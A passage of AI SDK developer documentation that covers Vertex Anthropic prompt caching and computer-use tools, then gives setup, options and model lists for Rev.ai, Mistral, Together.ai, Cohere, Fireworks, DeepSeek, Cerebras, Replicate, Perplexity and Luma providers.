            anthropic: { cacheControl: { type: 'ephemeral' } },
          },
        },
        { type: 'text', text: 'Explain the error message.' },
      ],
    },
  ],
});

console.log(result.text);
console.log(result.providerMetadata?.anthropic);
// e.g. { cacheCreationInputTokens: 2118, cacheReadInputTokens: 0 }

You can also use cache control on system messages by providing multiple system messages at the head of your messages array:

const result = await generateText({
  model: vertexAnthropic('claude-3-5-sonnet-20240620'),
  messages: [
    {
      role: 'system',
      content: 'Cached system message part',
      providerOptions: {
        anthropic: { cacheControl: { type: 'ephemeral' } },
      },
    },
    {
      role: 'system',
      content: 'Uncached system message part',
    },
    {
      role: 'user',
      content: 'User prompt',
    },
  ],
});

For more on prompt caching with Anthropic, see Google Vertex AI's Claude prompt caching documentation and Anthropic's Cache Control documentation.

Computer Use

Anthropic provides three built-in tools that can be used to interact with external systems:

Bash Tool: Allows running bash commands.
Text Editor Tool: Provides functionality for viewing and editing text files.
Computer Tool: Enables control of keyboard and mouse actions on a computer.

They are available via the tools property of the provider instance.

For more background see Anthropic's Computer Use documentation.

Bash Tool

The Bash Tool allows running bash commands. Here's how to create and use it:

const bashTool = vertexAnthropic.tools.bash_20241022({
  execute: async ({ command, restart }) => {
    // Implement your bash command execution logic here
    // Return the result of the command execution
  },
});

Parameters:

command (string): The bash command to run. Required unless the tool is being restarted.
restart (boolean, optional): Specifying true will restart this tool.

Text Editor Tool

The Text Editor Tool provides functionality for viewing and editing text files:

const textEditorTool = vertexAnthropic.tools.textEditor_20241022({
  execute: async ({
    command,
    path,
    file_text,
    insert_line,
    new_str,
    old_str,
    view_range,
  }) => {
    // Implement your text editing logic here
    // Return the result of the text editing operation
  },
});

Parameters:

command ('view' | 'create' | 'str_replace' | 'insert' | 'undo_edit'): The command to run.
path (string): Absolute path to file or directory, e.g. /repo/file.py or /repo.
file_text (string, optional): Required for create command, with the content of the file to be created.
insert_line (number, optional): Required for insert command. The line number after which to insert the new string.
new_str (string, optional): New string for str_replace or insert commands.
old_str (string, optional): Required for str_replace command, containing the string to replace.
view_range (number[], optional): Optional for view command to specify line range to show.

Computer Tool

The Computer Tool enables control of keyboard and mouse actions on a computer:

const computerTool = vertexAnthropic.tools.computer_20241022({
  displayWidthPx: 1920,
  displayHeightPx: 1080,
  displayNumber: 0, // Optional, for X11 environments

  execute: async ({ action, coordinate, text }) => {
    // Implement your computer control logic here
    // Return the result of the action

    // Example code:
    switch (action) {
      case 'screenshot': {
        // multipart result:
        return {
          type: 'image',
          data: fs
            .readFileSync('./data/screenshot-editor.png')
            .toString('base64'),
        };
      }
      default: {
        console.log('Action:', action);
        console.log('Coordinate:', coordinate);
        console.log('Text:', text);
        return `executed ${action}`;
      }
    }
  },

  // map to tool result content for LLM consumption:
  experimental_toToolResultContent(result) {
    return typeof result === 'string'
      ? [{ type: 'text', text: result }]
      : [{ type: 'image', data: result.data, mimeType: 'image/png' }];
  },
});

Parameters:

action ('key' | 'type' | 'mouse_move' | 'left_click' | 'left_click_drag' | 'right_click' | 'middle_click' | 'double_click' | 'screenshot' | 'cursor_position'): The action to perform.
coordinate (number[], optional): Required for mouse_move and left_click_drag actions. Specifies the (x, y) coordinates.
text (string, optional): Required for type and key actions.

These tools can be used in conjunction with the claude-3-5-sonnet-v2@20241022 model to enable more complex interactions and tasks.

Model Capabilities

The latest Anthropic model list on Vertex AI is available here. See also Anthropic Model Comparison.

Model	Image Input	Object Generation	Tool Usage	Tool Streaming	Computer Use
`claude-3-7-sonnet@20250219`
`claude-3-5-sonnet-v2@20241022`
`claude-3-5-sonnet@20240620`
`claude-3-5-haiku@20241022`
`claude-3-sonnet@20240229`
`claude-3-haiku@20240307`
`claude-3-opus@20240229`

title: Rev.ai description: Learn how to use the Rev.ai provider for the AI SDK.

Rev.ai Provider

The Rev.ai provider contains language model support for the Rev.ai transcription API.

Setup

The Rev.ai provider is available in the @ai-sdk/revai module. You can install it with

Provider Instance

You can import the default provider instance revai from @ai-sdk/revai:

import { revai } from '@ai-sdk/revai';

If you need a customized setup, you can import createRevai from @ai-sdk/revai and create a provider instance with your settings:

import { createRevai } from '@ai-sdk/revai';

const revai = createRevai({
  // custom settings, e.g.
  fetch: customFetch,
});

You can use the following optional settings to customize the Rev.ai provider instance:

apiKey string

API key that is being sent using the Authorization header. It defaults to the REVAI_API_KEY environment variable.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.

Transcription Models

You can create models that call the Rev.ai transcription API using the .transcription() factory method.

The first argument is the model id e.g. machine.

const model = revai.transcription('machine');

You can also pass additional provider-specific options using the providerOptions argument. For example, supplying the input language in ISO-639-1 (e.g. en) format can sometimes improve transcription performance if known beforehand.

import { experimental_transcribe as transcribe } from 'ai';
import { revai } from '@ai-sdk/revai';
import { readFile } from 'fs/promises';

const result = await transcribe({
  model: revai.transcription('machine'),
  audio: await readFile('audio.mp3'),
  providerOptions: { revai: { language: 'en' } },
});

The following provider options are available:

metadata string

Optional metadata that was provided during job submission.
notification_config object

Optional configuration for a callback url to invoke when processing is complete.
- url string - Callback url to invoke when processing is complete.
- auth_headers object - Optional authorization headers, if needed to invoke the callback.
delete_after_seconds integer

Amount of time after job completion when job is auto-deleted.
verbatim boolean

Configures the transcriber to transcribe every syllable, including all false starts and disfluencies.
rush boolean

[HIPAA Unsupported] Only available for human transcriber option. When set to true, your job is given higher priority.
skip_diarization boolean

Specify if speaker diarization will be skipped by the speech engine.
skip_postprocessing boolean

Only available for English and Spanish languages. User-supplied preference on whether to skip post-processing operations.
skip_punctuation boolean

Specify if "punct" type elements will be skipped by the speech engine.
remove_disfluencies boolean

When set to true, disfluencies (like 'ums' and 'uhs') will not appear in the transcript.
remove_atmospherics boolean

When set to true, atmospherics (like <laugh>, <affirmative>) will not appear in the transcript.
filter_profanity boolean

When enabled, profanities will be filtered by replacing characters with asterisks except for the first and last.
speaker_channels_count integer

Only available for English, Spanish and French languages. Specify the total number of unique speaker channels in the audio.
speakers_count integer

Only available for English, Spanish and French languages. Specify the total number of unique speakers in the audio.
diarization_type string

Specify diarization type. Possible values: "standard" (default), "premium".
custom_vocabulary_id string

Supply the id of a pre-completed custom vocabulary submitted through the Custom Vocabularies API.
custom_vocabularies Array

Specify a collection of custom vocabulary to be used for this job.
strict_custom_vocabulary boolean

If true, only exact phrases will be used as custom vocabulary.
summarization_config object

Specify summarization options.
- model string - Model type for summarization. Possible values: "standard" (default), "premium".
- type string - Summarization formatting type. Possible values: "paragraph" (default), "bullets".
- prompt string - Custom prompt for flexible summaries (mutually exclusive with type).
translation_config object

Specify translation options.
- target_languages Array - Array of target languages for translation.
- model string - Model type for translation. Possible values: "standard" (default), "premium".
language string

Language is provided as a ISO 639-1 language code. Default is "en".
forced_alignment boolean

When enabled, provides improved accuracy for per-word timestamps for a transcript. Default is false.

Currently supported languages:
- English (en, en-us, en-gb)
- French (fr)
- Italian (it)
- German (de)
- Spanish (es)
Note: This option is not available in low-cost environment.

Model Capabilities

Model	Transcription	Duration	Segments	Language
`machine`
`human`
`low_cost`
`fusion`

title: Mistral AI description: Learn how to use Mistral.

Mistral AI Provider

The Mistral AI provider contains language model support for the Mistral chat API.

Setup

The Mistral provider is available in the @ai-sdk/mistral module. You can install it with

Provider Instance

You can import the default provider instance mistral from @ai-sdk/mistral:

import { mistral } from '@ai-sdk/mistral';

If you need a customized setup, you can import createMistral from @ai-sdk/mistral and create a provider instance with your settings:

import { createMistral } from '@ai-sdk/mistral';

const mistral = createMistral({
  // custom settings
});

You can use the following optional settings to customize the Mistral provider instance:

baseURL string

Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is https://api.mistral.ai/v1.
apiKey string

API key that is being sent using the Authorization header. It defaults to the MISTRAL_API_KEY environment variable.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.

Language Models

You can create models that call the Mistral chat API using a provider instance. The first argument is the model id, e.g. mistral-large-latest. Some Mistral chat models support tool calls.

const model = mistral('mistral-large-latest');

Mistral chat models also support additional model settings that are not part of the standard call settings. You can pass them as an options argument:

const model = mistral('mistral-large-latest', {
  safePrompt: true, // optional safety prompt injection
});

The following optional settings are available for Mistral models:

safePrompt boolean

Whether to inject a safety prompt before all conversations.

Defaults to false.

Document OCR

Mistral chat models support document OCR for PDF files. You can optionally set image and page limits using the provider options.

const result = await generateText({
  model: mistral('mistral-small-latest'),
  messages: [
    {
      role: 'user',
      content: [
        {
          type: 'text',
          text: 'What is an embedding model according to this document?',
        },
        {
          type: 'file',
          data: new URL(
            'https://github.com/vercel/ai/blob/main/examples/ai-core/data/ai.pdf?raw=true',
          ),
          mimeType: 'application/pdf',
        },
      ],
    },
  ],
  // optional settings:
  providerOptions: {
    mistral: {
      documentImageLimit: 8,
      documentPageLimit: 64,
    },
  },
});

Example

You can use Mistral language models to generate text with the generateText function:

import { mistral } from '@ai-sdk/mistral';
import { generateText } from 'ai';

const { text } = await generateText({
  model: mistral('mistral-large-latest'),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});

Mistral language models can also be used in the streamText, generateObject, and streamObject functions (see AI SDK Core).

Model Capabilities

Model	Image Input	Object Generation	Tool Usage	Tool Streaming
`pixtral-large-latest`
`mistral-large-latest`
`mistral-small-latest`
`ministral-3b-latest`
`ministral-8b-latest`
`pixtral-12b-2409`

Embedding Models

You can create models that call the Mistral embeddings API using the .embedding() factory method.

const model = mistral.embedding('mistral-embed');

Model Capabilities

Model	Default Dimensions
`mistral-embed`	1024

title: Together.ai description: Learn how to use Together.ai's models with the AI SDK.

Together.ai Provider

The Together.ai provider contains support for 200+ open-source models through the Together.ai API.

Setup

The Together.ai provider is available via the @ai-sdk/togetherai module. You can install it with

Provider Instance

You can import the default provider instance togetherai from @ai-sdk/togetherai:

import { togetherai } from '@ai-sdk/togetherai';

If you need a customized setup, you can import createTogetherAI from @ai-sdk/togetherai and create a provider instance with your settings:

import { createTogetherAI } from '@ai-sdk/togetherai';

const togetherai = createTogetherAI({
  apiKey: process.env.TOGETHER_AI_API_KEY ?? '',
});

You can use the following optional settings to customize the Together.ai provider instance:

baseURL string

Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is https://api.together.xyz/v1.
apiKey string

API key that is being sent using the Authorization header. It defaults to the TOGETHER_AI_API_KEY environment variable.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.

Language Models

You can create Together.ai models using a provider instance. The first argument is the model id, e.g. google/gemma-2-9b-it.

const model = togetherai('google/gemma-2-9b-it');

Reasoning Models

Together.ai exposes the thinking of deepseek-ai/DeepSeek-R1 in the generated text using the <think> tag. You can use the extractReasoningMiddleware to extract this reasoning and expose it as a reasoning property on the result:

import { togetherai } from '@ai-sdk/togetherai';
import { wrapLanguageModel, extractReasoningMiddleware } from 'ai';

const enhancedModel = wrapLanguageModel({
  model: togetherai('deepseek-ai/DeepSeek-R1'),
  middleware: extractReasoningMiddleware({ tagName: 'think' }),
});

You can then use that enhanced model in functions like generateText and streamText.

Example

You can use Together.ai language models to generate text with the generateText function:

import { togetherai } from '@ai-sdk/togetherai';
import { generateText } from 'ai';

const { text } = await generateText({
  model: togetherai('meta-llama/Meta-Llama-3.1-8B-Instruct-Turbo'),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});

Together.ai language models can also be used in the streamText function (see AI SDK Core).

The Together.ai provider also supports completion models via (following the above example code) togetherai.completionModel() and embedding models via togetherai.textEmbeddingModel().

Model Capabilities

Model	Image Input	Object Generation	Tool Usage	Tool Streaming
`meta-llama/Meta-Llama-3.3-70B-Instruct-Turbo`
`meta-llama/Meta-Llama-3.1-8B-Instruct-Turbo`
`mistralai/Mixtral-8x22B-Instruct-v0.1`
`mistralai/Mistral-7B-Instruct-v0.3`
`deepseek-ai/DeepSeek-V3`
`google/gemma-2b-it`
`Qwen/Qwen2.5-72B-Instruct-Turbo`
`databricks/dbrx-instruct`

Image Models

You can create Together.ai image models using the .image() factory method. For more on image generation with the AI SDK see generateImage().

import { togetherai } from '@ai-sdk/togetherai';
import { experimental_generateImage as generateImage } from 'ai';

const { images } = await generateImage({
  model: togetherai.image('black-forest-labs/FLUX.1-dev'),
  prompt: 'A delighted resplendent quetzal mid flight amidst raindrops',
});

You can pass optional provider-specific request parameters using the providerOptions argument.

import { togetherai } from '@ai-sdk/togetherai';
import { experimental_generateImage as generateImage } from 'ai';

const { images } = await generateImage({
  model: togetherai.image('black-forest-labs/FLUX.1-dev'),
  prompt: 'A delighted resplendent quetzal mid flight amidst raindrops',
  size: '512x512',
  // Optional additional provider-specific request parameters
  providerOptions: {
    togetherai: {
      steps: 40,
    },
  },
});

For a complete list of available provider-specific options, see the Together.ai Image Generation API Reference.

Model Capabilities

Together.ai image models support various image dimensions that vary by model. Common sizes include 512x512, 768x768, and 1024x1024, with some models supporting up to 1792x1792. The default size is 1024x1024.

Available Models
`stabilityai/stable-diffusion-xl-base-1.0`
`black-forest-labs/FLUX.1-dev`
`black-forest-labs/FLUX.1-dev-lora`
`black-forest-labs/FLUX.1-schnell`
`black-forest-labs/FLUX.1-canny`
`black-forest-labs/FLUX.1-depth`
`black-forest-labs/FLUX.1-redux`
`black-forest-labs/FLUX.1.1-pro`
`black-forest-labs/FLUX.1-pro`
`black-forest-labs/FLUX.1-schnell-Free`

title: Cohere description: Learn how to use the Cohere provider for the AI SDK.

Cohere Provider

The Cohere provider contains language and embedding model support for the Cohere chat API.

Setup

The Cohere provider is available in the @ai-sdk/cohere module. You can install it with

Provider Instance

You can import the default provider instance cohere from @ai-sdk/cohere:

import { cohere } from '@ai-sdk/cohere';

If you need a customized setup, you can import createCohere from @ai-sdk/cohere and create a provider instance with your settings:

import { createCohere } from '@ai-sdk/cohere';

const cohere = createCohere({
  // custom settings
});

You can use the following optional settings to customize the Cohere provider instance:

baseURL string

Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is https://api.cohere.com/v2.
apiKey string

API key that is being sent using the Authorization header. It defaults to the COHERE_API_KEY environment variable.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.

Language Models

You can create models that call the Cohere chat API using a provider instance. The first argument is the model id, e.g. command-r-plus. Some Cohere chat models support tool calls.

const model = cohere('command-r-plus');

Example

You can use Cohere language models to generate text with the generateText function:

import { cohere } from '@ai-sdk/cohere';
import { generateText } from 'ai';

const { text } = await generateText({
  model: cohere('command-r-plus'),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});

Cohere language models can also be used in the streamText, generateObject, and streamObject functions (see AI SDK Core.

Model Capabilities

Model	Image Input	Object Generation	Tool Usage	Tool Streaming
`command-a-03-2025`
`command-r-plus`
`command-r`
`command-a-03-2025`
`command`
`command-light`

Embedding Models

You can create models that call the Cohere embed API using the .embedding() factory method.

const model = cohere.embedding('embed-english-v3.0');

Cohere embedding models support additional settings. You can pass them as an options argument:

const model = cohere.embedding('embed-english-v3.0', {
  inputType: 'search_document',
});

The following optional settings are available for Cohere embedding models:

inputType 'search_document' | 'search_query' | 'classification' | 'clustering'

Specifies the type of input passed to the model. Default is search_query.
- search_document: Used for embeddings stored in a vector database for search use-cases.
- search_query: Used for embeddings of search queries run against a vector DB to find relevant documents.
- classification: Used for embeddings passed through a text classifier.
- clustering: Used for embeddings run through a clustering algorithm.
truncate 'NONE' | 'START' | 'END'

Specifies how the API will handle inputs longer than the maximum token length. Default is END.
- NONE: If selected, when the input exceeds the maximum input token length will return an error.
- START: Will discard the start of the input until the remaining input is exactly the maximum input token length for the model.
- END: Will discard the end of the input until the remaining input is exactly the maximum input token length for the model.

Model Capabilities

Model	Embedding Dimensions
`embed-english-v3.0`	1024
`embed-multilingual-v3.0`	1024
`embed-english-light-v3.0`	384
`embed-multilingual-light-v3.0`	384
`embed-english-v2.0`	4096
`embed-english-light-v2.0`	1024
`embed-multilingual-v2.0`	768

title: Fireworks description: Learn how to use Fireworks models with the AI SDK.

Fireworks Provider

Fireworks is a platform for running and testing LLMs through their API.

Setup

The Fireworks provider is available via the @ai-sdk/fireworks module. You can install it with

Provider Instance

You can import the default provider instance fireworks from @ai-sdk/fireworks:

import { fireworks } from '@ai-sdk/fireworks';

If you need a customized setup, you can import createFireworks from @ai-sdk/fireworks and create a provider instance with your settings:

import { createFireworks } from '@ai-sdk/fireworks';

const fireworks = createFireworks({
  apiKey: process.env.FIREWORKS_API_KEY ?? '',
});

You can use the following optional settings to customize the Fireworks provider instance:

baseURL string

Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is https://api.fireworks.ai/inference/v1.
apiKey string

API key that is being sent using the Authorization header. It defaults to the FIREWORKS_API_KEY environment variable.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation.

Language Models

You can create Fireworks models using a provider instance. The first argument is the model id, e.g. accounts/fireworks/models/firefunction-v1:

const model = fireworks('accounts/fireworks/models/firefunction-v1');

Reasoning Models

Fireworks exposes the thinking of deepseek-r1 in the generated text using the <think> tag. You can use the extractReasoningMiddleware to extract this reasoning and expose it as a reasoning property on the result:

import { fireworks } from '@ai-sdk/fireworks';
import { wrapLanguageModel, extractReasoningMiddleware } from 'ai';

const enhancedModel = wrapLanguageModel({
  model: fireworks('accounts/fireworks/models/deepseek-r1'),
  middleware: extractReasoningMiddleware({ tagName: 'think' }),
});

You can then use that enhanced model in functions like generateText and streamText.

Example

You can use Fireworks language models to generate text with the generateText function:

import { fireworks } from '@ai-sdk/fireworks';
import { generateText } from 'ai';

const { text } = await generateText({
  model: fireworks('accounts/fireworks/models/firefunction-v1'),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});

Fireworks language models can also be used in the streamText function (see AI SDK Core).

Completion Models

You can create models that call the Fireworks completions API using the .completion() factory method:

const model = fireworks.completion('accounts/fireworks/models/firefunction-v1');

Model Capabilities

Model	Image Input	Object Generation	Tool Usage	Tool Streaming
`accounts/fireworks/models/deepseek-r1`
`accounts/fireworks/models/deepseek-v3`
`accounts/fireworks/models/llama-v3p1-405b-instruct`
`accounts/fireworks/models/llama-v3p1-8b-instruct`
`accounts/fireworks/models/llama-v3p2-3b-instruct`
`accounts/fireworks/models/llama-v3p3-70b-instruct`
`accounts/fireworks/models/mixtral-8x7b-instruct-hf`
`accounts/fireworks/models/mixtral-8x22b-instruct`
`accounts/fireworks/models/qwen2p5-coder-32b-instruct`
`accounts/fireworks/models/llama-v3p2-11b-vision-instruct`
`accounts/fireworks/models/yi-large`

Embedding Models

You can create models that call the Fireworks embeddings API using the .textEmbeddingModel() factory method:

const model = fireworks.textEmbeddingModel(
  'accounts/fireworks/models/nomic-embed-text-v1',
);

Image Models

You can create Fireworks image models using the .image() factory method. For more on image generation with the AI SDK see generateImage().

import { fireworks } from '@ai-sdk/fireworks';
import { experimental_generateImage as generateImage } from 'ai';

const { image } = await generateImage({
  model: fireworks.image('accounts/fireworks/models/flux-1-dev-fp8'),
  prompt: 'A futuristic cityscape at sunset',
  aspectRatio: '16:9',
});

Model Capabilities

For all models supporting aspect ratios, the following aspect ratios are supported:

1:1 (default), 2:3, 3:2, 4:5, 5:4, 16:9, 9:16, 9:21, 21:9

For all models supporting size, the following sizes are supported:

640 x 1536, 768 x 1344, 832 x 1216, 896 x 1152, 1024x1024 (default), 1152 x 896, 1216 x 832, 1344 x 768, 1536 x 640

Model	Dimensions Specification
`accounts/fireworks/models/flux-1-dev-fp8`	Aspect Ratio
`accounts/fireworks/models/flux-1-schnell-fp8`	Aspect Ratio
`accounts/fireworks/models/playground-v2-5-1024px-aesthetic`	Size
`accounts/fireworks/models/japanese-stable-diffusion-xl`	Size
`accounts/fireworks/models/playground-v2-1024px-aesthetic`	Size
`accounts/fireworks/models/SSD-1B`	Size
`accounts/fireworks/models/stable-diffusion-xl-1024-v1-0`	Size

For more details, see the Fireworks models page.

Stability AI Models

Fireworks also presents several Stability AI models backed by Stability AI API keys and endpoint. The AI SDK Fireworks provider does not currently include support for these models:

Model ID
`accounts/stability/models/sd3-turbo`
`accounts/stability/models/sd3-medium`
`accounts/stability/models/sd3`

title: DeepSeek description: Learn how to use DeepSeek's models with the AI SDK.

DeepSeek Provider

The DeepSeek provider offers access to powerful language models through the DeepSeek API, including their DeepSeek-V3 model.

API keys can be obtained from the DeepSeek Platform.

Setup

The DeepSeek provider is available via the @ai-sdk/deepseek module. You can install it with:

Provider Instance

You can import the default provider instance deepseek from @ai-sdk/deepseek:

import { deepseek } from '@ai-sdk/deepseek';

For custom configuration, you can import createDeepSeek and create a provider instance with your settings:

import { createDeepSeek } from '@ai-sdk/deepseek';

const deepseek = createDeepSeek({
  apiKey: process.env.DEEPSEEK_API_KEY ?? '',
});

You can use the following optional settings to customize the DeepSeek provider instance:

baseURL string

Use a different URL prefix for API calls. The default prefix is https://api.deepseek.com/v1.
apiKey string

API key that is being sent using the Authorization header. It defaults to the DEEPSEEK_API_KEY environment variable.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation.

Language Models

You can create language models using a provider instance:

import { deepseek } from '@ai-sdk/deepseek';
import { generateText } from 'ai';

const { text } = await generateText({
  model: deepseek('deepseek-chat'),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});

DeepSeek language models can be used in the streamText function (see AI SDK Core).

Reasoning

DeepSeek has reasoning support for the deepseek-reasoner model:

import { deepseek } from '@ai-sdk/deepseek';
import { generateText } from 'ai';

const { text, reasoning } = await generateText({
  model: deepseek('deepseek-reasoner'),
  prompt: 'How many people will live in the world in 2040?',
});

console.log(reasoning);
console.log(text);

See AI SDK UI: Chatbot for more details on how to integrate reasoning into your chatbot.

Cache Token Usage

DeepSeek provides context caching on disk technology that can significantly reduce token costs for repeated content. You can access the cache hit/miss metrics through the providerMetadata property in the response:

import { deepseek } from '@ai-sdk/deepseek';
import { generateText } from 'ai';

const result = await generateText({
  model: deepseek('deepseek-chat'),
  prompt: 'Your prompt here',
});

console.log(result.providerMetadata);
// Example output: { deepseek: { promptCacheHitTokens: 1856, promptCacheMissTokens: 5 } }

The metrics include:

promptCacheHitTokens: Number of input tokens that were cached
promptCacheMissTokens: Number of input tokens that were not cached

Model Capabilities

Model	Text Generation	Object Generation	Image Input	Tool Usage	Tool Streaming
`deepseek-chat`
`deepseek-reasoner`

title: Cerebras description: Learn how to use Cerebras's models with the AI SDK.

Cerebras Provider

The Cerebras provider offers access to powerful language models through the Cerebras API, including their high-speed inference capabilities powered by Wafer-Scale Engines and CS-3 systems.

API keys can be obtained from the Cerebras Platform.

Setup

The Cerebras provider is available via the @ai-sdk/cerebras module. You can install it with:

Provider Instance

You can import the default provider instance cerebras from @ai-sdk/cerebras:

import { cerebras } from '@ai-sdk/cerebras';

For custom configuration, you can import createCerebras and create a provider instance with your settings:

import { createCerebras } from '@ai-sdk/cerebras';

const cerebras = createCerebras({
  apiKey: process.env.CEREBRAS_API_KEY ?? '',
});

You can use the following optional settings to customize the Cerebras provider instance:

baseURL string

Use a different URL prefix for API calls. The default prefix is https://api.cerebras.ai/v1.
apiKey string

API key that is being sent using the Authorization header. It defaults to the CEREBRAS_API_KEY environment variable.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation.

Language Models

You can create language models using a provider instance:

import { cerebras } from '@ai-sdk/cerebras';
import { generateText } from 'ai';

const { text } = await generateText({
  model: cerebras('llama3.1-8b'),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});

Cerebras language models can be used in the streamText function (see AI SDK Core).

Model Capabilities

Model	Image Input	Object Generation	Tool Usage	Tool Streaming
`llama3.1-8b`
`llama3.1-70b`
`llama3.3-70b`

title: Replicate description: Learn how to use Replicate models with the AI SDK.

Replicate Provider

Replicate is a platform for running open-source AI models. It is a popular choice for running image generation models.

Setup

The Replicate provider is available via the @ai-sdk/replicate module. You can install it with

Provider Instance

You can import the default provider instance replicate from @ai-sdk/replicate:

import { replicate } from '@ai-sdk/replicate';

If you need a customized setup, you can import createReplicate from @ai-sdk/replicate and create a provider instance with your settings:

import { createReplicate } from '@ai-sdk/replicate';

const replicate = createReplicate({
  apiToken: process.env.REPLICATE_API_TOKEN ?? '',
});

You can use the following optional settings to customize the Replicate provider instance:

baseURL string

Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is https://api.replicate.com/v1.
apiToken string

API token that is being sent using the Authorization header. It defaults to the REPLICATE_API_TOKEN environment variable.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation.

Image Models

You can create Replicate image models using the .image() factory method. For more on image generation with the AI SDK see generateImage().

Supported Image Models

The following image models are currently supported by the Replicate provider:

You can also use versioned models. The id for versioned models is the Replicate model id followed by a colon and the version ID ($modelId:$versionId), e.g. bytedance/sdxl-lightning-4step:5599ed30703defd1d160a25a63321b4dec97101d98b4674bcc56e41f62f35637.

Basic Usage

import { replicate } from '@ai-sdk/replicate';
import { experimental_generateImage as generateImage } from 'ai';
import { writeFile } from 'node:fs/promises';

const { image } = await generateImage({
  model: replicate.image('black-forest-labs/flux-schnell'),
  prompt: 'The Loch Ness Monster getting a manicure',
  aspectRatio: '16:9',
});

await writeFile('image.webp', image.uint8Array);

console.log('Image saved as image.webp');

Model-specific options

import { replicate } from '@ai-sdk/replicate';
import { experimental_generateImage as generateImage } from 'ai';

const { image } = await generateImage({
  model: replicate.image('recraft-ai/recraft-v3'),
  prompt: 'The Loch Ness Monster getting a manicure',
  size: '1365x1024',
  providerOptions: {
    replicate: {
      style: 'realistic_image',
    },
  },
});

Versioned Models

import { replicate } from '@ai-sdk/replicate';
import { experimental_generateImage as generateImage } from 'ai';

const { image } = await generateImage({
  model: replicate.image(
    'bytedance/sdxl-lightning-4step:5599ed30703defd1d160a25a63321b4dec97101d98b4674bcc56e41f62f35637',
  ),
  prompt: 'The Loch Ness Monster getting a manicure',
});

For more details, see the Replicate models page.

title: Perplexity description: Learn how to use Perplexity's Sonar API with the AI SDK.

Perplexity Provider

The Perplexity provider offers access to Sonar API - a language model that uniquely combines real-time web search with natural language processing. Each response is grounded in current web data and includes detailed citations, making it ideal for research, fact-checking, and obtaining up-to-date information.

API keys can be obtained from the Perplexity Platform.

Setup

The Perplexity provider is available via the @ai-sdk/perplexity module. You can install it with:

Provider Instance

You can import the default provider instance perplexity from @ai-sdk/perplexity:

import { perplexity } from '@ai-sdk/perplexity';

For custom configuration, you can import createPerplexity and create a provider instance with your settings:

import { createPerplexity } from '@ai-sdk/perplexity';

const perplexity = createPerplexity({
  apiKey: process.env.PERPLEXITY_API_KEY ?? '',
});

You can use the following optional settings to customize the Perplexity provider instance:

baseURL string

Use a different URL prefix for API calls. The default prefix is https://api.perplexity.ai.
apiKey string

API key that is being sent using the Authorization header. It defaults to the PERPLEXITY_API_KEY environment variable.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation.

Language Models

You can create Perplexity models using a provider instance:

import { perplexity } from '@ai-sdk/perplexity';
import { generateText } from 'ai';

const { text } = await generateText({
  model: perplexity('sonar-pro'),
  prompt: 'What are the latest developments in quantum computing?',
});

Sources

Websites that have been used to generate the response are included in the sources property of the result:

import { perplexity } from '@ai-sdk/perplexity';
import { generateText } from 'ai';

const { text, sources } = await generateText({
  model: perplexity('sonar-pro'),
  prompt: 'What are the latest developments in quantum computing?',
});

console.log(sources);

Provider Options & Metadata

The Perplexity provider includes additional metadata in the response through providerMetadata. Additional configuration options are available through providerOptions.

const result = await generateText({
  model: perplexity('sonar-pro'),
  prompt: 'What are the latest developments in quantum computing?',
  providerOptions: {
    perplexity: {
      return_images: true, // Enable image responses (Tier-2 Perplexity users only)
    },
  },
});

console.log(result.providerMetadata);
// Example output:
// {
//   perplexity: {
//     usage: { citationTokens: 5286, numSearchQueries: 1 },
//     images: [
//       { imageUrl: "https://example.com/image1.jpg", originUrl: "https://elsewhere.com/page1", height: 1280, width: 720 },
//       { imageUrl: "https://example.com/image2.jpg", originUrl: "https://elsewhere.com/page2", height: 1280, width: 720 }
//     ]
//   },
// }

The metadata includes:

usage: Object containing citationTokens and numSearchQueries metrics
images: Array of image URLs when return_images is enabled (Tier-2 users only)

You can enable image responses by setting return_images: true in the provider options. This feature is only available to Perplexity Tier-2 users and above.

Model Capabilities

Model	Image Input	Object Generation	Tool Usage	Tool Streaming
`sonar-pro`
`sonar`
`sonar-deep-research`

title: Luma description: Learn how to use Luma AI models with the AI SDK.

Luma Provider

Luma AI provides state-of-the-art image generation models through their Dream Machine platform. Their models offer ultra-high quality image generation with superior prompt understanding and unique capabilities like character consistency and multi-image reference support.

Setup

The Luma provider is available via the @ai-sdk/luma module. You can install it with

Provider Instance

You can import the default provider instance luma from @ai-sdk/luma:

import { luma } from '@ai-sdk/luma';

If you need a customized setup, you can import createLuma and create a provider instance with your settings:

import { createLuma } from '@ai-sdk/luma';

const luma = createLuma({
  apiKey: 'your-api-key', // optional, defaults to LUMA_API_KEY environment variable
  baseURL: 'custom-url', // optional
  headers: {
